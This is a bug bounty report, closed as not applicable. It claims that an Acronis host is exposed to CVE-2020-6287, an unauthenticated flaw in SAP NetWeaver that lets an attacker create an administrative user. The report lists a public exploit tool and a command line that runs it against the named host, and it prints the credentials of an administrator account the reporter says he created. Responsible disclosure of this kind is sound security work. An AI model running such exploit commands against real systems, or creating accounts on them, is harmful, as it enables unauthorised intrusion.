CVE-2020-6287 https://redapi2.acronis.com
Critical
A
Acronis
Submitted None
Team Summary
Official summary from Acronis
The report is not applicable since redapi.acronis.com and redapi2.acronis.com are internally developed systems not related to SAP NetWeaver.
Actions:
Reported by
savik
Vulnerability Details
Technical details and impact analysis
Hi team.
## Summary
CVE-2020-6287 https://redapi2.acronis.com
https://nvd.nist.gov/vuln/detail/CVE-2020-6287
>SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.
You can check. I created user with role 'Administrator'
```
sapRpoc9846:Secure!PwD7849
```
## Steps To Reproduce
1. clone https://github.com/chipik/SAP_RECON
1. `python3 RECON.py -a -H redapi2.acronis.com -P 443 -s`
Thanks.
## Impact
administrative user on sap system
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2020-6287
CRITICAL
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising …
Report Details
Additional information and metadata
State
Closed
Substate
Not-Applicable
Submitted
Weakness
Improper Access Control - Generic